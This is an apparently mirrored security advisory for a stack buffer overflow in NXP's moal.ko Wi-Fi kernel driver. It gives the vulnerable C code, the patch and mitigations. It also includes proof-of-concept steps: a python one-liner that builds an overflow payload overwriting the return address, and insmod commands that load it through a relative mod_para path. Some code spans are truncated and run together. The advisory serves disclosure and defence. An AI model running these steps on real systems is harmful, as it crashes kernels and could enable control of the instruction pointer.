Share
## https://sploitus.com/exploit?id=90E9817C-EB37-5B54-B408-86D73C806716
# CVE-2025-29338 โ€” Security Advisory

## Buffer Overflow in NXP moal.ko Wi-Fi Kernel Driver (`woal_setup_module_param` / `parse_cfg_get_line`)

| Field | Value |
|---|---|
| **CVE ID** | CVE-2025-29338 |
| **Severity** | High |
| **CVSS v3.1 Score** | 7.8 |
| **CVSS v3.1 Vector** | `CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H` |
| **Vulnerability Type** | Stack-Based Buffer Overflow (CWE-121) |
| **Attack Vector** | Local |
| **Vendor** | NXP Semiconductors |
| **Vendor Patch Status** | Patched |
| **Discoverer** | Mahmoud Jadaan โ€” diconium auto GmbH |

---

## Summary

A stack-based buffer overflow vulnerability exists in the NXP **moal.ko** Wi-Fi kernel driver (version 5.1.7.10) across firmware builds `v17.92.1.p149.43` through `v17.92.1.p149.157`. The vulnerability is located in `parse_cfg_get_line` (`mlinux/moal_init.c`), called from `woal_setup_module_param`. The while loop that reads configuration file lines into a fixed-size stack buffer lacks a destination bounds check, allowing a line of arbitrary length to overflow the buffer, corrupt the stack, and trigger a kernel panic. NXP PSIRT confirmed the vulnerability and the fix has been released.

---

## Affected Products

| Field | Detail |
|---|---|
| **Vendor** | NXP Semiconductors |
| **Component** | moal.ko Wi-Fi kernel driver |
| **Driver Version** | 5.1.7.10 |
| **Firmware โ€” First Affected** | v17.92.1.p149.43 |
| **Firmware โ€” Last Affected** | v17.92.1.p149.157 |

---

## Vulnerability Details

### Root Cause

`woal_setup_module_param` allocates a fixed stack buffer of `MAX_LINE_LEN` bytes and passes it to `parse_cfg_get_line` on each iteration while processing the `mod_para` configuration file:

```c
// woal_setup_module_param โ€” mlinux/moal_init.c
char line[MAX_LINE_LEN];
...
while (parse_cfg_get_line(data, size, line) != -1) {
    // process line
}
```

In the vulnerable revision of `parse_cfg_get_line`, the while loop condition checks only the source position and line terminators โ€” there is **no check on how many bytes have been written to the destination buffer**:

```c
// parse_cfg_get_line โ€” vulnerable version (mlinux/moal_init.c)
static t_size parse_cfg_get_line(t_u8 *data, t_size size, t_u8 *line_pos)
{
    t_u8 *src, *dest;
    static t_s32 pos;

    if (pos >= size) {
        pos = 0;
        return -1;
    }
    memset(line_pos, 0, MAX_LINE_LEN);
    src = data + pos;
    dest = line_pos;

    while (pos  Provided for defensive and research purposes only.

### Step 1 โ€” Unload existing modules

```sh
#!/bin/sh
rmmod moal
rmmod mlan
```

### Step 2 โ€” Create the malicious configuration file

The stack buffer is filled with `A`s, followed by 8 bytes for the stack canary slot (`B`s), 8 bytes for the saved `rbp` (`C`s), and 8 bytes to overwrite the return address (`D`s):

```sh
python3 -c 'print("A"*256 + "B"*8 + "C"*8 + "D"*8)' > payload.bin
```

### Step 3 โ€” Load the module with the crafted config

The `mod_para` path must be **relative to the directory where the kernel searches for firmware** (typically `/lib/firmware/`). Construct the path accordingly:

```sh
#!/bin/sh
PAYLOAD_PATH=../..//payload.bin

insmod /lib/modules/nxp9098/wifi/mlan.ko
insmod /lib/modules/nxp9098/wifi/moal.ko \
    mod_para=$PAYLOAD_PATH \
    drvdbg=0x7
```

### Step 4 โ€” Observed result

A kernel panic is triggered immediately during module initialization. Kernel logs confirm the return address is overwritten with `0x4444444444444444` (ASCII `DDDDDDDD`), demonstrating full control of the instruction pointer:

```
[insmod] Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in:
         woal_setup_module_param+0xd4/0x3e4 [moal]
[insmod] 0x4444444444444444   = (MAX_LINE_LEN-1)) {
+                      PRINTM(MERROR, "input data size exceeds the dest buff limit\n");
+                      break;
+              }
       }
       /* parse new line */
       pos++;
```

---

## Mitigation

Update to a firmware version beyond v17.92.1.p149.157 which includes the patch above. As additional hardening:

1. **Restrict module loading** โ€” limit `CAP_SYS_MODULE` to trusted administrators; enforce `init_module` / `finit_module` syscall restrictions via SELinux, AppArmor, or `seccomp`.
2. **Protect configuration file paths** โ€” ensure the path referenced by `mod_para` and the files it points to are only writable by root.

---

## References

- **NXP mwifiex Driver (GPL):** https://github.com/nxp-imx/mwifiex
- **NXP Release Notes:** https://www.nxp.com/docs/en/release-note/RN00104.pdf

---

## Vendor Status

NXP PSIRT confirmed the vulnerability. The fix has been released as part of a formal software update.

---

## Credits

**Discoverer:** Mahmoud Jadaan โ€” diconium auto GmbH

---

*This advisory is published as a public reference to satisfy minimum CVE disclosure requirements per the CVE Program.*